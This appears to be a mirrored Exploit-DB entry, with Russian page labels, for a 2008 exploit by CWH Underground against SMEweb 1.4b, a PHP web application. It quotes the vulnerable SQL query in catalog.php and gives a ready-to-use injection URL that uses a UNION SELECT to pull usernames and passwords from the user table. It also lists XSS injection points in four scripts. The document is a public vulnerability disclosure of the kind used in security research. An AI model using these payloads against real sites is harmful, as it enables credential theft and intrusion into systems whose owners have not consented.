- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5725
- Проверка EDB
-
- Пройдено
- Автор
- CWH UNDERGROUND
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2652 cve-2008-2644
- Дата публикации
- 2008-06-02
Код:
=======================================================
SMEweb 1.4b (SQL/XSS) Multiple Remote Vulnerabilities
=======================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 2 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : SMEweb
VERSION : 1.4b
VENDOR : http://www.smethailand.com/
DOWNLOAD : http://www.geocities.com/smes_thailand/smeweb_v14b.zip
#####################################################
---SQL Injection Exploit---
##############################################
Vulnerable: catalog.php (Line:66-69)
if($idp)
$sql = "select * from ".$fix."catalog where idp='$idp' and category NOT IN ('L1','LA') ";
elseif($category)
$sql = "select * from ".$fix."catalog where category='$category' order by idp desc limit 1";
$result = mysql_db_query($dbname,$sql);
###############################################
***It's Work with Magic_quote must turn off***
http://[target]/[path]/catalog.php?idp=1'union select 1,2,password,username,5,6,7,8 from smeweb_user where userid=1 ORDER BY counter/*
---Multiple Remote XSS Exploit---
[+]catalog.php
[+]search.php
[+]bb.php
[+]order.php
Example:
http://[target]/[path]/catalog.php?data=<XSS>
http://[target]/[path]/search.php?keyword=<XSS>
http://[target]/[path]/bb.php?page=<XSS>
http://[target]/[path]/order.php?new_s=<XSS>
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
# milw0rm.com [2008-06-02]
- Источник
- www.exploit-db.com